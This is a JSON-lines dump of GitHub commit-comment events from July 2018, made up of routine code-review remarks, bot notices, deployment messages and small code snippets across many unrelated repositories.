{"id":"7935053959","type":"CommitCommentEvent","actor":{"login":"argowang"},"repo":{"name":"argowang/CodeOfDuty"},"payload":{"comment":{"id":29635845,"position":null,"line":null,"path":null,"commit_id":"f120697b98e4bb3c684dc047c71ed8350ab81f2e","created_at":"2018-07-09T02:16:32Z","updated_at":"2018-07-09T02:16:32Z","author_association":"OWNER","body":"A minor modification would be swapping these two conditions. i.e. while( first == chars[j] && j < chars.length). This will save you a couple operations since j < chars.length would only be rejected during the entire time. "}},"created_at":"2018-07-09T02:16:32Z"}
{"id":"7935054218","type":"CommitCommentEvent","actor":{"login":"McAfeeAdminInstance2"},"repo":{"name":"McAfeeInst2Org1/newrepo"},"payload":{"comment":{"id":29635846,"position":1,"line":null,"path":"1531102596.42/github_test.txt","commit_id":"3637a2a6b6d1c6c9ce5eb0fbaf0c7c3f65227ede","created_at":"2018-07-09T02:16:39Z","updated_at":"2018-07-09T02:16:39Z","author_association":"CONTRIBUTOR","body":"889976543"}},"created_at":"2018-07-09T02:16:39Z"}
{"id":"7935054268","type":"CommitCommentEvent","actor":{"login":"argowang"},"repo":{"name":"argowang/CodeOfDuty"},"payload":{"comment":{"id":29635847,"position":13,"line":13,"path":"largeGroupPositions.java","commit_id":"f120697b98e4bb3c684dc047c71ed8350ab81f2e","created_at":"2018-07-09T02:16:40Z","updated_at":"2018-07-09T02:16:40Z","author_association":"OWNER","body":"A minor modification would be swapping these two conditions. i.e. while( first == chars[j] && j < chars.length). This will save you a couple operations since j < chars.length would only be rejected during the entire time.\r\n\r\n"}},"created_at":"2018-07-09T02:16:40Z"}
{"id":"7935055519","type":"CommitCommentEvent","actor":{"login":"argowang"},"repo":{"name":"argowang/CodeOfDuty"},"payload":{"comment":{"id":29635850,"position":null,"line":null,"path":null,"commit_id":"f120697b98e4bb3c684dc047c71ed8350ab81f2e","created_at":"2018-07-09T02:17:15Z","updated_at":"2018-07-09T02:17:15Z","author_association":"OWNER","body":"LGTM"}},"created_at":"2018-07-09T02:17:15Z"}
{"id":"7935063495","type":"CommitCommentEvent","actor":{"login":"bmzhanglei"},"repo":{"name":"bmzhanglei/test"},"payload":{"comment":{"id":29635854,"position":null,"line":null,"path":null,"commit_id":"d7cc8bd4a0cf72ed972bcd1f3d5ef2624b4df6a2","created_at":"2018-07-09T02:20:54Z","updated_at":"2018-07-09T02:20:54Z","author_association":"OWNER","body":"dfgdfgdfgdfg"}},"created_at":"2018-07-09T02:20:54Z"}
{"id":"7935064905","type":"CommitCommentEvent","actor":{"login":"straw1105"},"repo":{"name":"straw1105/token-profile"},"payload":{"comment":{"id":29635855,"position":null,"line":null,"path":null,"commit_id":"b385c7fdc26e8013fad473daec1f4f86d6a55b16","created_at":"2018-07-09T02:21:34Z","updated_at":"2018-07-09T02:21:34Z","author_association":"OWNER","body":"@makoshan    I hope you can review it as soon as possible. I want to modify the logo."}},"created_at":"2018-07-09T02:21:34Z"}
{"id":"7935065362","type":"CommitCommentEvent","actor":{"login":"wangyunjie1993"},"repo":{"name":"wangyunjie1993/OpinionEvolution"},"payload":{"comment":{"id":29635857,"position":null,"line":null,"path":null,"commit_id":"75bf6cccc20f7adbc55d88aa65b858e32f166164","created_at":"2018-07-09T02:21:46Z","updated_at":"2018-07-09T02:21:46Z","author_association":"OWNER","body":"0709"}},"created_at":"2018-07-09T02:21:46Z"}
{"id":"7935065545","type":"CommitCommentEvent","actor":{"login":"argowang"},"repo":{"name":"argowang/CodeOfDuty"},"payload":{"comment":{"id":29635858,"position":10,"line":10,"path":"largeGroupPositions.java","commit_id":"f120697b98e4bb3c684dc047c71ed8350ab81f2e","created_at":"2018-07-09T02:21:51Z","updated_at":"2018-07-09T02:21:51Z","author_association":"OWNER","body":"Could you put chars.length into a variable? Right now it is calculated O(n) times here and below in the while loop."}},"created_at":"2018-07-09T02:21:51Z"}
{"id":"7935083453","type":"CommitCommentEvent","actor":{"login":"copumpkin"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":29635874,"position":null,"line":null,"path":null,"commit_id":"631dd7a4e974547b9ff483401e5256fa5aa3797e","created_at":"2018-07-09T02:29:33Z","updated_at":"2018-07-09T02:29:33Z","author_association":"MEMBER","body":"Cool, thanks!"}},"created_at":"2018-07-09T02:29:33Z"}
{"id":"7935084375","type":"CommitCommentEvent","actor":{"login":"mitchelloharawild"},"repo":{"name":"robjhyndman/forecast"},"payload":{"comment":{"id":29635877,"position":5,"line":412,"path":"R/lm.R","commit_id":"6fc8281dab2831dca752f01cbed5a6bf24f9efb0","created_at":"2018-07-09T02:29:58Z","updated_at":"2018-07-09T02:29:58Z","author_association":"COLLABORATOR","body":"Fixed in a54774928ad3165665fe1d9ee234258382eaef8c"}},"created_at":"2018-07-09T02:29:58Z"}
{"id":"7935088461","type":"CommitCommentEvent","actor":{"login":"jeanlego"},"repo":{"name":"eclipse/omr"},"payload":{"comment":{"id":29635883,"position":6,"line":5,"path":"example/glue/configure_includes/configure_linux_aarch64.mk","commit_id":"e52206a5de493e8b3096a6763be9c4aa19ef3eb6","created_at":"2018-07-09T02:31:45Z","updated_at":"2018-07-09T02:31:45Z","author_association":"CONTRIBUTOR","body":"Must have forgotten to switch this one here! Sorry! "}},"created_at":"2018-07-09T02:31:45Z"}
{"id":"7935088599","type":"CommitCommentEvent","actor":{"login":"discoursebot"},"repo":{"name":"discourse/discourse"},"payload":{"comment":{"id":29635884,"position":null,"line":null,"path":null,"commit_id":"72a34573796dedcba8a9275f6d45f5c83603c14f","created_at":"2018-07-09T02:31:49Z","updated_at":"2018-07-09T02:31:49Z","author_association":"NONE","body":"This commit has been mentioned on **Discourse Meta**. There might be relevant details there:\n\nhttps://meta.discourse.org/t/uninitialized-constant-exifr-jpeg/90281/7\n"}},"created_at":"2018-07-09T02:31:49Z"}
{"id":"7935092576","type":"CommitCommentEvent","actor":{"login":"jaraco"},"repo":{"name":"jaraco/tempora"},"payload":{"comment":{"id":29635891,"position":1,"line":1,"path":"CHANGES.rst","commit_id":"87bd83bd8401cef6d6fc2997b87ffe8862a0665a","created_at":"2018-07-09T02:33:42Z","updated_at":"2018-07-09T02:33:42Z","author_association":"OWNER","body":"Perhaps... I'm always a little hesitant to add preemptive upper bound pins, especially when a small (sometimes inconsequential) yet backward-incompatible change is released. That one release leads to every project that's pinned the upper bound to account for and adapt for the change, which leads many developers to be reluctant to release backward-incompatible changes or to batch them, behaviors I wish to discourage.\r\n\r\nOn the other hand, if a truly consequential and relevant backward-incompatible change were to be released, you'd have liked to have pinned against that version such that old releases of the software aren't suddenly exposed to the incompatibility.\r\n\r\nOverall, in my experience, it's generally preferable to follow the less rigorous approach and only pin against an upper bound if the bound in question is _likely to produce an incompatibility for the depending project_. For the dependencies of cherrypy and cheroot, I don't foresee any breaking changes, so my preference would be to keep the dependencies unpinned."}},"created_at":"2018-07-09T02:33:42Z"}
{"id":"7935106019","type":"CommitCommentEvent","actor":{"login":"darlaker"},"repo":{"name":"awsdocs/aws-codepipeline-user-guide"},"payload":{"comment":{"id":29635904,"position":null,"line":null,"path":null,"commit_id":"d43bf53a6635f0bde7dbc648f8b3ed685302da4f","created_at":"2018-07-09T02:39:40Z","updated_at":"2018-07-09T02:39:40Z","author_association":"CONTRIBUTOR","body":"Hello @Jumblemuddle , thank you for your question on the CodePipeline User Guide files. I am checking into this issue, but I am not sure which content is missing? Are there markdown files in the latest commit that do not have the information you are looking for? This content was delivered May 1 as part of the webhooks feature release (https://docs.aws.amazon.com/codepipeline/latest/userguide/history.html). Does that help to answer your question? "}},"created_at":"2018-07-09T02:39:40Z"}
{"id":"7935106382","type":"CommitCommentEvent","actor":{"login":"Dcutrara1"},"repo":{"name":"Dcutrara1/-IC_01"},"payload":{"comment":{"id":29635905,"position":null,"line":null,"path":null,"commit_id":"390a0ab7bfb6fc37f3d99247907079f21d89f7e3","created_at":"2018-07-09T02:39:49Z","updated_at":"2018-07-09T02:39:49Z","author_association":"OWNER","body":"[CST- 117 - Cutrara, Daniel - Milestone 1.pdf](https://github.com/Dcutrara1/-IC_01/files/2174474/CST-.117.-.Cutrara.Daniel.-.Milestone.1.pdf)\r\n"}},"created_at":"2018-07-09T02:39:49Z"}
{"id":"7935106804","type":"CommitCommentEvent","actor":{"login":"ceroeiby"},"repo":{"name":"ceroeiby/CursoIngresoJS"},"payload":{"comment":{"id":29635906,"position":null,"line":null,"path":null,"commit_id":"5314686599b32f863e632ddf11fff85862471242","created_at":"2018-07-09T02:40:00Z","updated_at":"2018-07-09T02:40:00Z","author_association":"OWNER","body":"/*Debemos lograr tomar el importe por ID.\r\nTransformarlo a entero (parseInt), luego\r\nmostrar el importe con un Descuento del 25 %\r\nen el cuadro de texto \"RESULTADO\"*/\r\nfunction mostrarAumento()\r\n{\r\n\tvar importe;\r\n\r\n\t\timporte=document.getElementById('importe').value;\r\n\t\t\timporte=parseInt(importe);\r\n\t\t\t\r\n\r\n\t\tresDescuento=(importe*25)/100;\r\n\r\n\r\n\t\tdocument.getElementById('resultado').value= resDescuento;\r\n\t\t\t\tdescuento=parseInt(descuento);\r\n\r\n\r\n}\r\n"}},"created_at":"2018-07-09T02:40:00Z"}
{"id":"7935108818","type":"CommitCommentEvent","actor":{"login":"SanjitKal"},"repo":{"name":"disco-lang/disco"},"payload":{"comment":{"id":29635908,"position":4,"line":54,"path":"src/Disco/Syntax/Operators.hs","commit_id":"5c3733123b26d91d0ae3efe980d07c3dcdbc178e","created_at":"2018-07-09T02:40:54Z","updated_at":"2018-07-09T02:40:54Z","author_association":"COLLABORATOR","body":"Oh shoot, thanks for catching this. I had accidentally removed some PosSub related things when adding SSub, and I guess I accidentally added PosSub as BOp constructor."}},"created_at":"2018-07-09T02:40:54Z"}
{"id":"7935109701","type":"CommitCommentEvent","actor":{"login":"lydragon"},"repo":{"name":"lydragon/RabbitMQ.Client.KProvider"},"payload":{"comment":{"id":29635926,"position":1,"line":1,"path":"README.md","commit_id":"94a2c7c5bdd8093e128aedeebf08d72b2ab789a2","created_at":"2018-07-09T02:41:18Z","updated_at":"2018-07-09T02:41:18Z","author_association":"OWNER","body":"NetCore"}},"created_at":"2018-07-09T02:41:18Z"}
{"id":"7935109897","type":"CommitCommentEvent","actor":{"login":"xplx"},"repo":{"name":"xplx/SpringCloud"},"payload":{"comment":{"id":29635927,"position":null,"line":null,"path":null,"commit_id":"68ad0e728550c722a95973ff63462ef0fe6c951d","created_at":"2018-07-09T02:41:23Z","updated_at":"2018-07-09T02:41:23Z","author_association":"OWNER","body":"删除文件"}},"created_at":"2018-07-09T02:41:23Z"}
{"id":"7935110117","type":"CommitCommentEvent","actor":{"login":"lydragon"},"repo":{"name":"lydragon/RabbitMQ.Client.KProvider"},"payload":{"comment":{"id":29635928,"position":null,"line":null,"path":null,"commit_id":"94a2c7c5bdd8093e128aedeebf08d72b2ab789a2","created_at":"2018-07-09T02:41:29Z","updated_at":"2018-07-09T02:41:29Z","author_association":"OWNER","body":"NetCore"}},"created_at":"2018-07-09T02:41:29Z"}
{"id":"7935110272","type":"CommitCommentEvent","actor":{"login":"Dcutrara1"},"repo":{"name":"Dcutrara1/-IC_01"},"payload":{"comment":{"id":29635929,"position":null,"line":null,"path":null,"commit_id":"4bdd54cd664cc625965b2caeea094c959dc84eda","created_at":"2018-07-09T02:41:34Z","updated_at":"2018-07-09T02:41:34Z","author_association":"OWNER","body":"[CST- 117 - Cutrara, Daniel - Milestone 1.pdf](https://github.com/Dcutrara1/-IC_01/files/2174476/CST-.117.-.Cutrara.Daniel.-.Milestone.1.pdf)\r\n"}},"created_at":"2018-07-09T02:41:34Z"}
{"id":"7935112431","type":"CommitCommentEvent","actor":{"login":"yonghyun123"},"repo":{"name":"yonghyun123/vue-practice"},"payload":{"comment":{"id":29635930,"position":null,"line":null,"path":null,"commit_id":"e02f999f7e819df3d5946076f7df4a1308140ece","created_at":"2018-07-09T02:42:33Z","updated_at":"2018-07-09T02:42:33Z","author_association":"OWNER","body":"따로 레포 파기 귀찮아서..."}},"created_at":"2018-07-09T02:42:33Z"}
{"id":"7935120933","type":"CommitCommentEvent","actor":{"login":"accumulatepig"},"repo":{"name":"chrislusf/seaweedfs"},"payload":{"comment":{"id":29635949,"position":null,"line":null,"path":null,"commit_id":"702ff48cdac224e0ec9f8b9f03591785496e5874","created_at":"2018-07-09T02:45:57Z","updated_at":"2018-07-09T02:45:57Z","author_association":"NONE","body":"Maybe  add a startup parameter  to control the list number?"}},"created_at":"2018-07-09T02:45:57Z"}
{"id":"7935122820","type":"CommitCommentEvent","actor":{"login":"prjemian"},"repo":{"name":"areaDetector/ADCore"},"payload":{"comment":{"id":29635950,"position":null,"line":null,"path":null,"commit_id":"6637eaa1a8accf306ce75e49b8beae5b607be2c8","created_at":"2018-07-09T02:46:46Z","updated_at":"2018-07-09T02:46:46Z","author_association":"CONTRIBUTOR","body":"Agreed\n\nOn Sun, Jul 8, 2018, 8:49 PM Mark Rivers <notifications@github.com> wrote:\n\n> Perhaps I should make a 3-3-2 release that adds WITH_QSRV=YES/NO. Having\n> WITH_PVA=YES and WITH_QSRV=NO would allow using PVA but still work in\n> 3.14.12.\n>\n> This would be a pretty trivial fix.\n>\n> Thoughts?\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/areaDetector/ADCore/commit/6637eaa1a8accf306ce75e49b8beae5b607be2c8#commitcomment-29635744>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ACLKML3rli3AcR82G1a1ywdWwY2MFsAwks5uEraSgaJpZM4VG554>\n> .\n>\n"}},"created_at":"2018-07-09T02:46:46Z"}
{"id":"7935123171","type":"CommitCommentEvent","actor":{"login":"shouton"},"repo":{"name":"peatio/peatio"},"payload":{"comment":{"id":29635952,"position":null,"line":null,"path":null,"commit_id":"5de80c882db1404d08eb715dbc67dd12d3cd6831","created_at":"2018-07-09T02:46:55Z","updated_at":"2018-07-09T02:46:55Z","author_association":"NONE","body":"@hpyhacking can you git commit in one time? \r\n\r\nactually, what you did, was whatever. "}},"created_at":"2018-07-09T02:46:55Z"}
{"id":"7935125049","type":"CommitCommentEvent","actor":{"login":"byorgey"},"repo":{"name":"disco-lang/disco"},"payload":{"comment":{"id":29635953,"position":4,"line":54,"path":"src/Disco/Syntax/Operators.hs","commit_id":"5c3733123b26d91d0ae3efe980d07c3dcdbc178e","created_at":"2018-07-09T02:47:47Z","updated_at":"2018-07-09T02:47:47Z","author_association":"MEMBER","body":"Sure.  To be clear, we *should* remove `PosSub`-related things."}},"created_at":"2018-07-09T02:47:47Z"}
{"id":"7935126351","type":"CommitCommentEvent","actor":{"login":"dangitstam"},"repo":{"name":"dangitstam/le-traducteur"},"payload":{"comment":{"id":29635954,"position":5,"line":86,"path":"library/models/english_to_french.py","commit_id":"89aebf15d139a9f3c9666876659cf5b52e6251a0","created_at":"2018-07-09T02:48:21Z","updated_at":"2018-07-09T02:48:21Z","author_association":"OWNER","body":"This was supposed to be it's own commit, completing the seq2seq model."}},"created_at":"2018-07-09T02:48:21Z"}
{"id":"7935128536","type":"CommitCommentEvent","actor":{"login":"hrtbrkd"},"repo":{"name":"shahmirn/EdiZon_ConfigsAndScripts"},"payload":{"comment":{"id":29635956,"position":null,"line":null,"path":null,"commit_id":"423323cf2a7464b4969aa5c338b95cdc6516dc79","created_at":"2018-07-09T02:49:13Z","updated_at":"2018-07-09T02:49:13Z","author_association":"NONE","body":"where you able to get this working? freezes on me when i select the save."}},"created_at":"2018-07-09T02:49:13Z"}
{"id":"7935133420","type":"CommitCommentEvent","actor":{"login":"wyinys"},"repo":{"name":"forezp/SpringcloudConfig"},"payload":{"comment":{"id":29635964,"position":2,"line":2,"path":"respo/config-client-dev.properties","commit_id":"a68876a6211369bae723348d5f8c3defe4a55e04","created_at":"2018-07-09T02:51:26Z","updated_at":"2018-07-09T02:51:26Z","author_association":"NONE","body":"foo = foo version 15666"}},"created_at":"2018-07-09T02:51:26Z"}
{"id":"7935139568","type":"CommitCommentEvent","actor":{"login":"zdy199"},"repo":{"name":"zdy199/ssm-crud"},"payload":{"comment":{"id":29635969,"position":4,"line":15,"path":"src/main/java/com/zdy/crud/bean/Msg.java","commit_id":"5d21204c86608749347d8942756d27afa32ec059","created_at":"2018-07-09T02:54:12Z","updated_at":"2018-07-09T02:54:12Z","author_association":"OWNER","body":"ok"}},"created_at":"2018-07-09T02:54:12Z"}
{"id":"7939783321","type":"CommitCommentEvent","actor":{"login":"ekbassa"},"repo":{"name":"ekbassa/Week2Proj1"},"payload":{"comment":{"id":29646982,"position":null,"line":null,"path":null,"commit_id":"7c533d677d4e739509aa11c67e9dde8dd02fcc37","created_at":"2018-07-09T20:00:52Z","updated_at":"2018-07-09T20:00:52Z","author_association":"OWNER","body":"was checked "}},"created_at":"2018-07-09T20:00:52Z"}
{"id":"7939784163","type":"CommitCommentEvent","actor":{"login":"turion"},"repo":{"name":"turion/rhine"},"payload":{"comment":{"id":29646986,"position":null,"line":null,"path":null,"commit_id":"47770f8879c49c45b711b2fa3a0a46ff50d203a2","created_at":"2018-07-09T20:01:03Z","updated_at":"2018-07-09T20:01:03Z","author_association":"OWNER","body":"@ggreif thanks, fixed in develop!"}},"created_at":"2018-07-09T20:01:03Z"}
{"id":"7939786529","type":"CommitCommentEvent","actor":{"login":"BelRija"},"repo":{"name":"BelRija/myChat"},"payload":{"comment":{"id":29646988,"position":null,"line":null,"path":null,"commit_id":"876dbd061154bd3a4dccdc6cf2bdd4d11e2c7e53","created_at":"2018-07-09T20:01:32Z","updated_at":"2018-07-09T20:01:32Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.bluemix.net/devops/toolchains/c65cbe3a-93c6-404b-bfcf-fdc329794a72?env_id=ibm%3Ayp%3Aeu-de \"myChat\"): [Delivery Pipeline](https://console.bluemix.net/devops/pipelines/8082f571-1fcd-44eb-8182-121978b3d23f?env_id=ibm%3Ayp%3Aeu-de \"myChat\") deployed [myChat](https://github.com/BelRija/myChat/releases/tag/deploy-ibm-yp-eu-de-Marija.Belova-Student.Reutlingen-University.DE-dev-20180709-200120 \"deploy-ibm-yp-eu-de-Marija.Belova-Student.Reutlingen-University.DE-dev-20180709-200120\") to [dev](https://console.bluemix.net/apps/d1062cbe-ed7c-49cf-afef-28924e703e96?env_id=ibm:yp:eu-de \"ibm:yp:eu-de:Marija.Belova@Student.Reutlingen-University.DE:dev\"), including this commit"}},"created_at":"2018-07-09T20:01:32Z"}
{"id":"7939786757","type":"CommitCommentEvent","actor":{"login":"Lyndsky"},"repo":{"name":"Lyndsky/Lyndsky.github.io"},"payload":{"comment":{"id":29646989,"position":null,"line":null,"path":null,"commit_id":"a4a29801adc4ade13b8537d045a3a05cb35c5104","created_at":"2018-07-09T20:01:35Z","updated_at":"2018-07-09T20:01:35Z","author_association":"OWNER","body":"a"}},"created_at":"2018-07-09T20:01:35Z"}
{"id":"7939787981","type":"CommitCommentEvent","actor":{"login":"capitains-hook"},"repo":{"name":"PerseusDL/canonical-greekLit"},"payload":{"comment":{"id":29646992,"position":null,"line":null,"path":null,"commit_id":"307eb4a836d2fa39eb855f3e091ea322615827fd","created_at":"2018-07-09T20:01:49Z","updated_at":"2018-07-09T20:01:49Z","author_association":"NONE","body":"## Global\n\n| Changed            |   Status |\n|:-------------------|---------:|\n| `coverage`         |     0.08 |\n| `metadata_passing` |     2    |\n| `metadata_total`   |     2    |\n| `nodes_count`      |     5    |\n| `texts_passing`    |     1    |\n| `texts_total`      |     1    |\n\n## Words\n\n| Changed   |   Status |\n|:----------|---------:|\n| `grc`     |   +22753 |\n\n## Units\n\n| Changed                                                 | Status   |\n|:--------------------------------------------------------|:---------|\n| `./data/tlg0023/__cts__.xml`                            | New      |\n| `./data/tlg0023/tlg001/__cts__.xml`                     | New      |\n| `./data/tlg0023/tlg001/tlg0023.tlg001.perseus-grc2.xml` | New      |\n| `./data/tlg0023/__cts__.xml`                            | Passing  |\n| `./data/tlg0023/tlg001/__cts__.xml`                     | Passing  |\n| `./data/tlg0023/tlg001/tlg0023.tlg001.perseus-grc2.xml` | Passing  |\n\n*[Hook UI build recap](http://ci.perseids.org/repo/PerseusDL/canonical-greekLit/4428)*\n"}},"created_at":"2018-07-09T20:01:49Z"}
{"id":"7939789197","type":"CommitCommentEvent","actor":{"login":"wolfsage"},"repo":{"name":"wolfsage/JMAP-TestSuite"},"payload":{"comment":{"id":29646994,"position":78,"line":112,"path":"lib/JMAP/TestSuite/JMAP/Tester/Wrapper.pm","commit_id":"0fa13441769b0dbcd13c444c1905f301896b6330","created_at":"2018-07-09T20:02:04Z","updated_at":"2018-07-09T20:02:04Z","author_association":"OWNER","body":"Yeah, not sure. Hackathon it is!"}},"created_at":"2018-07-09T20:02:04Z"}
{"id":"7939789456","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29646996,"position":null,"line":null,"path":null,"commit_id":"02291f2c06268f91b11aca19dba09c300752ef9d","created_at":"2018-07-09T20:02:08Z","updated_at":"2018-07-09T20:02:08Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#pr-af-servn](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#pr-af-servn).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-af-servn-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-09T20:02:08Z"}
{"id":"7939790673","type":"CommitCommentEvent","actor":{"login":"ariofrio"},"repo":{"name":"harvesthq/platform"},"payload":{"comment":{"id":29646997,"position":null,"line":null,"path":null,"commit_id":"0ecaa63ce5ac067f6cef46ab6d0229a679b8dc74","created_at":"2018-07-09T20:02:23Z","updated_at":"2018-07-09T20:02:23Z","author_association":"NONE","body":"Does this mean that window._harvestPlatformConfig.permalink is going to be deprecated at some point in favor of data-permalink on each button, or are both supported?"}},"created_at":"2018-07-09T20:02:23Z"}
{"id":"7939791024","type":"CommitCommentEvent","actor":{"login":"kalturaguy"},"repo":{"name":"kaltura/media-server"},"payload":{"comment":{"id":29646998,"position":11,"line":11,"path":"installation/updateServerNodeConfiguration.sh","commit_id":"1ab23934a3f8dce6c3d91542ab45f5f0df1449f2","created_at":"2018-07-09T20:02:27Z","updated_at":"2018-07-09T20:02:27Z","author_association":"CONTRIBUTOR","body":"@david-winder-kaltura  add -s to the curl so it won't do progress"}},"created_at":"2018-07-09T20:02:27Z"}
{"id":"7939791903","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/pyvtk-feedstock"},"payload":{"comment":{"id":29647000,"position":null,"line":null,"path":null,"commit_id":"587bc1eec30156ad1a5ed14617e8c8d6f78c47c2","created_at":"2018-07-09T20:02:38Z","updated_at":"2018-07-09T20:02:38Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @davidcortesortuno were added to conda-forge. Welcome to conda-forge!\n  Go to https://github.com/orgs/conda-forge/invitation see your invitation.\n\n- @davidcortesortuno were added to this feedstock maintenance team.\n  You should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-09T20:02:38Z"}
{"id":"7939792346","type":"CommitCommentEvent","actor":{"login":"slvnperron"},"repo":{"name":"botpress/botpress"},"payload":{"comment":{"id":29647001,"position":null,"line":null,"path":null,"commit_id":"4f15d113788d68dc904f361a40b21ce5007fda0e","created_at":"2018-07-09T20:02:44Z","updated_at":"2018-07-09T20:02:44Z","author_association":"MEMBER","body":"@emirotin I'm not sure what happened, but I remember when I ran the deploy command it was bumping to v11. @epaminond , did you manually change the version?"}},"created_at":"2018-07-09T20:02:44Z"}
{"id":"7939793067","type":"CommitCommentEvent","actor":{"login":"slvnperron"},"repo":{"name":"botpress/botpress"},"payload":{"comment":{"id":29647004,"position":null,"line":null,"path":null,"commit_id":"4f15d113788d68dc904f361a40b21ce5007fda0e","created_at":"2018-07-09T20:02:53Z","updated_at":"2018-07-09T20:02:53Z","author_association":"MEMBER","body":"Ref to https://github.com/botpress/botpress/issues/719"}},"created_at":"2018-07-09T20:02:53Z"}
{"id":"7939794913","type":"CommitCommentEvent","actor":{"login":"gabzim"},"repo":{"name":"gabzim/learning"},"payload":{"comment":{"id":29647006,"position":15,"line":15,"path":"src/main/kotlin/io/learning/api/di/DatabaseModule.kt","commit_id":"34ee8c78e2fd315e35633fb1a5554d2faad156fc","created_at":"2018-07-09T20:03:17Z","updated_at":"2018-07-09T20:03:17Z","author_association":"OWNER","body":"@nico89ar Lo haría en otro modulo, otra persona no puede saber bien de donde vienen las propiedades porque es medio impredecible que vengan del modulo de database."}},"created_at":"2018-07-09T20:03:17Z"}
{"id":"7939795195","type":"CommitCommentEvent","actor":{"login":"MarcelRaad"},"repo":{"name":"curl/curl"},"payload":{"comment":{"id":29647007,"position":null,"line":null,"path":null,"commit_id":"8272ec50f02bd5277bdad09a98ddfc8c6d68a979","created_at":"2018-07-09T20:03:20Z","updated_at":"2018-07-09T20:03:20Z","author_association":"MEMBER","body":"Ah, yes, that's it!"}},"created_at":"2018-07-09T20:03:20Z"}
{"id":"7939797107","type":"CommitCommentEvent","actor":{"login":"capitains-hook"},"repo":{"name":"PerseusDL/canonical-greekLit"},"payload":{"comment":{"id":29647009,"position":null,"line":null,"path":null,"commit_id":"307eb4a836d2fa39eb855f3e091ea322615827fd","created_at":"2018-07-09T20:03:43Z","updated_at":"2018-07-09T20:03:43Z","author_association":"NONE","body":"\n\n*[Hook UI build recap](http://ci.perseids.org/repo/PerseusDL/canonical-greekLit/4429)*\n"}},"created_at":"2018-07-09T20:03:43Z"}
{"id":"7939797714","type":"CommitCommentEvent","actor":{"login":"blaggacao"},"repo":{"name":"alpinelinux/aports"},"payload":{"comment":{"id":29647011,"position":null,"line":null,"path":null,"commit_id":"02b38ef8a4abb0abc41a202a359c6d0aa2a925e7","created_at":"2018-07-09T20:03:51Z","updated_at":"2018-07-09T20:03:51Z","author_association":"CONTRIBUTOR","body":"Hm, I'm seriously thinking about... I'm like a 15% building expert (no expert). Can you point me to how to do cross platform building? I don't want to do that on my raspberry without knowing how to do it... :)\r\n\r\nIs it even possible with something like the following on a x86_64 maschine?\r\n```\r\n# Alpine Version 3.7\r\nFROM andyshinn/alpine-abuild:v6 as sane-builder\r\n\r\n# Build sane\r\nENV PACKAGER=\"XOE Solutions <info@xoe.solutions>\"\r\nUSER builder\r\nRUN abuild-keygen -ain\r\nCOPY apk .\r\nRUN abuilder -r\r\n```"}},"created_at":"2018-07-09T20:03:51Z"}
{"id":"7939798737","type":"CommitCommentEvent","actor":{"login":"kalturaguy"},"repo":{"name":"kaltura/media-server"},"payload":{"comment":{"id":29647013,"position":36,"line":36,"path":"installation/updateServerNodeConfiguration.sh","commit_id":"1ab23934a3f8dce6c3d91542ab45f5f0df1449f2","created_at":"2018-07-09T20:04:04Z","updated_at":"2018-07-09T20:04:04Z","author_association":"CONTRIBUTOR","body":"@david-winder-kaltura . I think you add the new_ips as string and NOT as json...  so you will have a wierd JSON wher ips is a string instead of an object"}},"created_at":"2018-07-09T20:04:04Z"}
{"id":"7939800473","type":"CommitCommentEvent","actor":{"login":"m-stein"},"repo":{"name":"ehmry/genode"},"payload":{"comment":{"id":29647016,"position":null,"line":null,"path":null,"commit_id":"f23f5d1b8da29707a3658bd7074f49cdb3ba2bb2","created_at":"2018-07-09T20:04:24Z","updated_at":"2018-07-09T20:04:24Z","author_association":"NONE","body":"@ehmry I have fixed the test/lwip/http_client on my 2335_LwIP_VFS_plugin branch with static IP. DHCP doesn't work so far."}},"created_at":"2018-07-09T20:04:24Z"}
{"id":"7939805246","type":"CommitCommentEvent","actor":{"login":"lpdmagee"},"repo":{"name":"RBVI/CyPlot"},"payload":{"comment":{"id":29647022,"position":null,"line":null,"path":null,"commit_id":"3e68f13c360768a49b5704c6c36c5b453748459a","created_at":"2018-07-09T20:05:24Z","updated_at":"2018-07-09T20:05:24Z","author_association":"COLLABORATOR","body":"I've eliminated the CyPlotFactory because all plots will have their own factories and tasks, so tunables will only appear after the user has clicked on an option and nothing will happen if the user clicks on \"CyPlot.\" I’ve made the drop down menu and template files for the tasks and factories so we now just need to fill in those files (when I say \"template files,\" I really mean that I copy and pasted the code for Volcano plots supplied by Allison).\r\n\r\nAlso, I've done some whiteboarding for the UI. I'm unsure of how we'll be implementing JPanels, etc. (sigh), but this should be the basics. I'm assuming we'll need to use panels and whatnot to allow the user to fine tune/format their choices, but in the meantime, using tunables to get the broad strokes out of the way seems like it should work well enough. Still no luck figuring out the html stuff though.\r\n![img_0157](https://user-images.githubusercontent.com/40338045/42473165-b9ba69b4-8378-11e8-8d25-d7de8507039e.JPG)\r\n"}},"created_at":"2018-07-09T20:05:24Z"}
